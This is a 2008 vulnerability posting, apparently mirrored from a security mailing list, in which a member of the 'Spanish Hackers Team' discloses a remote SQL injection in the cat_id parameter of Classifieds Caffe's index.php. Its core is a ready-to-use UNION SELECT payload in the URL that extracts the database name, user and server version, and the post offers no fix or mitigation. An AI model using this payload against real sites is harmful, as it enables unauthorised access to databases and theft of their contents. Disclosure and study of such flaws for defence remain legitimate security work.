Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

From:Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:17.04.2008
Subject:Classifieds Caffe (index.php cat_id) Remote SQL Injection

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+               Classifieds Caffe (index.php cat_id) Remote SQL Injection            +==--
--
==+==============================================================================
======+==--
                    [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com

[+] Exploit:

[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),
char(58),user(),char(58),version()),
char),3/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--
==+==============================================================================
======+==--
                                      [+] [The End]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Рейтинг@Mail.ru